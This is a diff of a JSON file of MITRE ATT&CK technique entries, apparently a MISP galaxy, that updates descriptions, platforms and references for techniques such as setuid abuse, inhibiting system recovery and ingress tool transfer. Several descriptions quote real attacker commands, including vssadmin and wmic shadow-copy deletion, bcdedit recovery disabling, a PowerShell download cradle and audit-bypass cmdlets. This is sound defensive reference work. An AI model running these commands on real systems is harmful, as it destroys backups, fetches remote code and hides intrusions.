+ "description": "An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.\n\nInstead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222/002)). The chmod command can set these bits with bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file]. This will enable the setuid bit. To enable the setgid bit, chmod 2775 and chmod g+s can be used.\n\nAdversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware) This abuse is often part of a \"shell escape\" or other actions to bypass an execution environment with restricted permissions.\n\nAlternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)). The setuid and setguid bits are indicated with an \"s\" instead of an \"x\" when viewing a file's attributes via ls -l. The find command can also be used to search for such files. For example, find / -perm +4000 2>/dev/null can be used to find files with setuid set and find / -perm +2000 2>/dev/null may be used for setgid. Binaries that have these bits set may then be abused by adversaries.(Citation: GTFOBins Suid)",
"meta": {
"external_id": "T1548.001",
"kill_chain": [
@@ -10085,8 +10145,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1498/001",
- "https://capec.mitre.org/data/definitions/125.html",
- "https://capec.mitre.org/data/definitions/486.html",
"https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf",
"https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged"
]
@@ -10119,8 +10177,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1499/001",
- "https://capec.mitre.org/data/definitions/469.html",
- "https://capec.mitre.org/data/definitions/482.html",
"https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf",
"https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf",
"https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/",
@@ -10466,9 +10522,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1499/002",
- "https://capec.mitre.org/data/definitions/488.html",
- "https://capec.mitre.org/data/definitions/489.html",
- "https://capec.mitre.org/data/definitions/528.html",
"https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf",
"https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf",
"https://www.cloudflare.com/learning/ddos/http-flood-ddos-attack/",
@@ -10690,7 +10743,7 @@
"value": "Domain Generation Algorithms - T1568.002"
},
{
- "description": "An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. \n\nCloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic)",
+ "description": "An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable logging to avoid detection of their activities.\n\nFor example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) In Office 365, an adversary may disable logging on mail collection activities for specific users by using the `Set-MailboxAuditBypassAssociation` cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user’s license from an Enterprise E5 to an Enterprise E3 license.(Citation: Dark Reading Microsoft 365 Attacks 2021)",
"meta": {
"external_id": "T1562.008",
"kill_chain": [
@@ -10698,17 +10751,23 @@
],
"mitre_data_sources": [
"Cloud Service: Cloud Service Disable",
- "Cloud Service: Cloud Service Modification"
+ "Cloud Service: Cloud Service Modification",
+ "User Account: User Account Modification"
],
"mitre_platforms": [
- "IaaS"
+ "IaaS",
+ "SaaS",
+ "Google Workspace",
+ "Azure AD",
+ "Office 365"
],
"refs": [
"https://attack.mitre.org/techniques/T1562/008",
"https://cloud.google.com/logging/docs/audit/configure-data-access",
"https://docs.aws.amazon.com/awscloudtrail/latest/userguide/stop-cloudtrail-from-sending-events-to-cloudwatch-logs.html",
"https://docs.microsoft.com/en-us/cli/azure/monitor/diagnostic-settings?view=azure-cli-latest#az_monitor_diagnostic_settings_delete",
- "https://expel.io/blog/following-cloudtrail-generating-aws-security-signals-sumo-logic/"
+ "https://expel.io/blog/following-cloudtrail-generating-aws-security-signals-sumo-logic/",
+ "https://www.darkreading.com/threat-intelligence/incident-responders-explore-microsoft-365-attacks-in-the-wild/d/d-id/1341591"
]
},
"related": [
@@ -10890,7 +10949,6 @@
"refs": [
"http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf",
"https://attack.mitre.org/techniques/T1553/004",
- "https://capec.mitre.org/data/definitions/479.html",
"https://docs.microsoft.com/sysinternals/downloads/sigcheck",
"https://en.wikipedia.org/wiki/Root_certificate",
"https://objective-see.com/blog/blog_0x26.html",
@@ -11101,8 +11159,7 @@
"Windows"
],
"refs": [
- "https://attack.mitre.org/techniques/T1566/003",
- "https://capec.mitre.org/data/definitions/163.html"
+ "https://attack.mitre.org/techniques/T1566/003"
]
},
"related": [
@@ -11229,7 +11286,6 @@
"refs": [
"https://attack.mitre.org/techniques/T1547/004",
"https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order",
- "https://capec.mitre.org/data/definitions/579.html",
"https://technet.microsoft.com/en-us/sysinternals/bb963902"
]
},
@@ -11468,8 +11524,6 @@
"http://www.nth-dimension.org.uk/pub/BTL.pdf",
"https://attack.mitre.org/techniques/T1574/006",
"https://blog.timac.org/2012/1218-simple-code-injection-using-dyld_insert_libraries/",
- "https://capec.mitre.org/data/definitions/13.html",
- "https://capec.mitre.org/data/definitions/640.html",
"https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html",
"https://jon-gabilondo-angulo-7635.medium.com/how-to-inject-code-into-mach-o-apps-part-ii-ddb13ebc8191",
"https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/",
@@ -11489,7 +11543,7 @@
"value": "Dynamic Linker Hijacking - T1574.006"
},
{
- "description": "Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule or Set-InboxRule [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)\n\nAdversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account.\n\nAny user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as malware, suspicious, phish, and hack) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security)",
+ "description": "Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule or Set-InboxRule [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)\n\nAdversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account.\n\nAny user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as malware, suspicious, phish, and hack) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security)\n\nIn some environments, administrators may be able to enable email rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to automatically modify or delete all emails related to specific topics (such as internal security incident notifications).",
"meta": {
"external_id": "T1564.008",
"kill_chain": [
@@ -11511,6 +11565,7 @@
"https://attack.mitre.org/techniques/T1564/008",
"https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps",
"https://docs.microsoft.com/en-us/powershell/module/exchange/set-inboxrule?view=exchange-ps",
+ "https://learn.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules",
"https://support.apple.com/guide/mail/use-rules-to-manage-emails-you-receive-mlhlp1017/mac",
"https://support.microsoft.com/en-us/office/manage-email-messages-by-using-rules-c24f5dea-9465-4df4-ad17-a50704d66c59",
"https://techcommunity.microsoft.com/t5/security-compliance-and-identity/rule-your-inbox-with-microsoft-cloud-app-security/ba-p/299154",
@@ -11557,6 +11612,72 @@
"uuid": "0708ae90-d0eb-4938-9a76-d0fc94f6eec1",
"value": "Revert Cloud Instance - T1578.004"
},
+ {
+ "description": "Adversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process. Network provider DLLs allow Windows to interface with specific network protocols and can also support add-on credential management functions.(Citation: Network Provider API) During the logon process, Winlogon (the interactive logon module) sends credentials to the local `mpnotify.exe` process via RPC. The `mpnotify.exe` process then shares the credentials in cleartext with registered credential managers when notifying that a logon event is happening.(Citation: NPPSPY - Huntress)(Citation: NPPSPY Video)(Citation: NPLogonNotify) \n\nAdversaries can configure a malicious network provider DLL to receive credentials from `mpnotify.exe`.(Citation: NPPSPY) Once installed as a credential manager (via the Registry), a malicious DLL can receive and save credentials each time a user logs onto a Windows workstation or domain via the `NPLogonNotify()` function.(Citation: NPLogonNotify)\n\nAdversaries may target planting malicious network provider DLLs on systems known to have increased logon activity and/or administrator logon activity, such as servers and domain controllers.(Citation: NPPSPY - Huntress)",
+ "meta": {
+ "external_id": "T1556.008",
+ "kill_chain": [
+ "mitre-attack:credential-access",
+ "mitre-attack:defense-evasion",
+ "mitre-attack:persistence"
+ ],
+ "mitre_data_sources": [
+ "File: File Creation",
+ "Process: OS API Execution",
+ "Windows Registry: Windows Registry Key Creation",
+ "Windows Registry: Windows Registry Key Modification"
+ ],
+ "mitre_platforms": [
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/techniques/T1556/008",
+ "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy",
+ "https://learn.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nplogonnotify",
+ "https://learn.microsoft.com/en-us/windows/win32/secauthn/network-provider-api",
+ "https://www.huntress.com/blog/cleartext-shenanigans-gifting-user-passwords-to-adversaries-with-nppspy",
+ "https://www.youtube.com/watch?v=ggY3srD9dYs"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84",
+ "type": "subtechnique-of"
+ }
+ ],
+ "uuid": "90c4a591-d02d-490b-92aa-619d9701ac04",
+ "value": "Network Provider DLL - T1556.008"
+ },
+ {
+ "description": "Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.\n\nRather than or in addition to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), an adversary can spoof positive affirmations that security tools are continuing to function even after legitimate security tools have been disabled (e.g., [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)). An adversary can also present a “healthy” system status even after infection. This can be abused to enable further malicious activity by delaying defender responses.\n\nFor example, adversaries may show a fake Windows Security GUI and tray icon with a “healthy” system status after Windows Defender and other system tools have been disabled.(Citation: BlackBasta)",
+ "meta": {
+ "external_id": "T1562.011",
+ "kill_chain": [
+ "mitre-attack:defense-evasion"
+ ],
+ "mitre_data_sources": [
+ "Process: Process Creation",
+ "Sensor Health: Host Status"
+ ],
+ "mitre_platforms": [
+ "Windows",
+ "macOS",
+ "Linux"
+ ],
+ "refs": [
+ "https://attack.mitre.org/techniques/T1562/011",
+ "https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529",
+ "type": "subtechnique-of"
+ }
+ ],
+ "uuid": "bef8aaee-961d-4359-a308-4c2182bcedff",
+ "value": "Spoof Security Alerting - T1562.011"
+ },
{
"description": "Adversaries may modify XDG autostart entries to execute programs or commands during system boot. Linux desktop environments that are XDG compliant implement functionality for XDG autostart entries. These entries will allow an application to automatically start during the startup of a desktop environment after user logon. By default, XDG autostart entries are stored within the /etc/xdg/autostart or ~/.config/autostart directories and have a .desktop file extension.(Citation: Free Desktop Application Autostart Feb 2006)\n\nWithin an XDG autostart entry file, the Type key specifies if the entry is an application (type 1), link (type 2) or directory (type 3). The Name key indicates an arbitrary name assigned by the creator and the Exec key indicates the application and command line arguments to execute.(Citation: Free Desktop Entry Keys)\n\nAdversaries may use XDG autostart entries to maintain persistence by executing malicious commands and payloads, such as remote access tools, during the startup of a desktop environment. Commands included in XDG autostart entries with execute after user logon in the context of the currently logged on user. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make XDG autostart entries look as if they are associated with legitimate programs.",
"meta": {
@@ -11604,7 +11725,7 @@
"value": "Identify business processes/tempo - T1280"
},
{
- "description": "Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nVarious utilities and commands may acquire this information, including whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts. Environment variables, such as %USERNAME% and $USER, may also be used to access this information.",
+ "description": "Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nVarious utilities and commands may acquire this information, including whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts. Environment variables, such as %USERNAME% and $USER, may also be used to access this information.\n\nOn network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)",
"meta": {
"external_id": "T1033",
"kill_chain": [
@@ -11624,11 +11745,13 @@
"mitre_platforms": [
"Linux",
"macOS",
- "Windows"
+ "Windows",
+ "Network"
],
"refs": [
"https://attack.mitre.org/techniques/T1033",
- "https://capec.mitre.org/data/definitions/577.html"
+ "https://us-cert.cisa.gov/ncas/alerts/TA18-106A",
+ "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-s5.html"
]
},
"uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
@@ -11810,7 +11933,7 @@
"value": "Obtain booter/stressor subscription - T1396"
},
{
- "description": "Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.(Citation: Prevailion DarkWatchman 2021)",
+ "description": "Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)\n\nAdversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) commands and [Native API](https://attack.mitre.org/techniques/T1106) functions.",
"meta": {
"external_id": "T1010",
"kill_chain": [
@@ -11828,7 +11951,8 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1010",
- "https://www.prevailion.com/darkwatchman-new-fileless-techniques/"
+ "https://www.prevailion.com/darkwatchman-new-fileless-techniques/",
+ "https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/"
]
},
"uuid": "4ae4f953-fe58-4cc8-a327-33257e30a830",
@@ -12005,8 +12129,7 @@
"Linux"
],
"refs": [
- "https://attack.mitre.org/techniques/T1007",
- "https://capec.mitre.org/data/definitions/574.html"
+ "https://attack.mitre.org/techniques/T1007"
]
},
"uuid": "322bad5a-1c49-4d23-ab79-76d641794afa",
@@ -12034,7 +12157,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1080",
- "https://capec.mitre.org/data/definitions/562.html",
"https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html"
]
},
@@ -12088,7 +12210,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1120",
- "https://capec.mitre.org/data/definitions/646.html",
"https://linuxhint.com/list-usb-devices-linux/",
"https://ss64.com/osx/system_profiler.html"
]
@@ -12235,7 +12356,7 @@
"value": "Device Administrator Permissions - T1401"
},
{
- "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). \n\nFiles can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016)\n\nOn Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)",
+ "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). \n\nFiles can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016)\n\nOn Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)",
"meta": {
"external_id": "T1105",
"kill_chain": [
@@ -12334,7 +12455,7 @@
"value": "Application Deployment Software - T1017"
},
{
- "description": "Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nAdversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP. ",
+ "description": "Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nAdversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP. ",
"meta": {
"external_id": "T1071",
"kill_chain": [
@@ -12411,7 +12532,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1018",
- "https://capec.mitre.org/data/definitions/292.html",
"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a",
"https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql",
"https://www.us-cert.gov/ncas/alerts/TA18-106A"
@@ -12690,8 +12810,7 @@
"Windows"
],
"refs": [
- "https://attack.mitre.org/techniques/T1072",
- "https://capec.mitre.org/data/definitions/187.html"
+ "https://attack.mitre.org/techniques/T1072"
]
},
"uuid": "92a78814-b191-47ca-909c-1ccfe3777414",
@@ -12718,7 +12837,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1082",
- "https://capec.mitre.org/data/definitions/312.html",
"https://cloud.google.com/compute/docs/reference/rest/v1/instances",
"https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html",
"https://docs.microsoft.com/en-us/rest/api/compute/virtualmachines/get",
@@ -12898,7 +13016,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1046",
- "https://capec.mitre.org/data/definitions/300.html",
"https://developer.apple.com/library/archive/documentation/Cocoa/Conceptual/NetServices/Introduction.html",
"https://themittenmac.com/what-does-apt-activity-look-like-on-macos/",
"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a"
@@ -12971,28 +13088,36 @@
"value": "Stored Application Data - T1409"
},
{
- "description": "Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.\n\nOperating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)\n\nA number of native Windows utilities have been used by adversaries to disable or delete system recovery features:\n\n* vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet\n* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete\n* wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet\n* bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no",
+ "description": "Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.\n\nOperating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore, adversaries may disable recovery notifications, then corrupt backups.(Citation: disable_notif_synology_ransom)\n\nA number of native Windows utilities have been used by adversaries to disable or delete system recovery features:\n\n* vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet\n* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete\n* wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet\n* bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no\n* REAgentC.exe can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system\n\nOn network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.\n\nAdversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)",
"meta": {
"external_id": "T1490",
"kill_chain": [
"mitre-attack:impact"
],
"mitre_data_sources": [
+ "Cloud Storage: Cloud Storage Deletion",
"Command: Command Execution",
"File: File Deletion",
"Process: Process Creation",
"Service: Service Metadata",
+ "Snapshot: Snapshot Deletion",
"Windows Registry: Windows Registry Key Modification"
],
"mitre_platforms": [
"Windows",
"macOS",
- "Linux"
+ "Linux",
+ "Network",
+ "IaaS"
],
"refs": [
"https://attack.mitre.org/techniques/T1490",
"https://blog.talosintelligence.com/2018/02/olympic-destroyer.html",
- "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html"
+ "https://rhinosecuritylabs.com/aws/s3-ransomware-part-2-prevention-and-defense/",
+ "https://twitter.com/TheDFIRReport/status/1498657590259109894",
+ "https://www.darkreading.com/attacks-breaches/code-hosting-service-shuts-down-after-cyber-attack",
+ "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html",
+ "https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/"
]
},
"uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
@@ -13260,7 +13385,7 @@
"value": "Cloud Infrastructure Discovery - T1580"
},
{
- "description": "Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access.\n\nAdversaries may generate these credential materials in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), [Steal Application Access Token](https://attack.mitre.org/techniques/T1528), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users. The generation of web credentials often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.(Citation: GitHub AWS-ADFS-Credential-Generator)\n\nOnce forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)(Citation: Microsoft SolarWinds Customer Guidance)",
+ "description": "Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access.\n\nAdversaries may generate these credential materials in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), [Steal Application Access Token](https://attack.mitre.org/techniques/T1528), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users. The generation of web credentials often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.(Citation: GitHub AWS-ADFS-Credential-Generator) Adversaries may also forge tokens by taking advantage of features such as the `AssumeRole` and `GetFederationToken` APIs in AWS, which allow users to request temporary security credentials.(Citation: AWS Temporary Security Credentials)\n\nOnce forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)(Citation: Microsoft SolarWinds Customer Guidance) ",
"meta": {
"external_id": "T1606",
"kill_chain": [
@@ -13283,6 +13408,7 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1606",
+ "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html",
"https://github.com/damianh/aws-adfs-credential-generator",
"https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/",
"https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/",
@@ -13387,7 +13513,7 @@
"value": "NTFS File Attributes - T1096"
},
{
- "description": "Adversaries may attempt to find group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.",
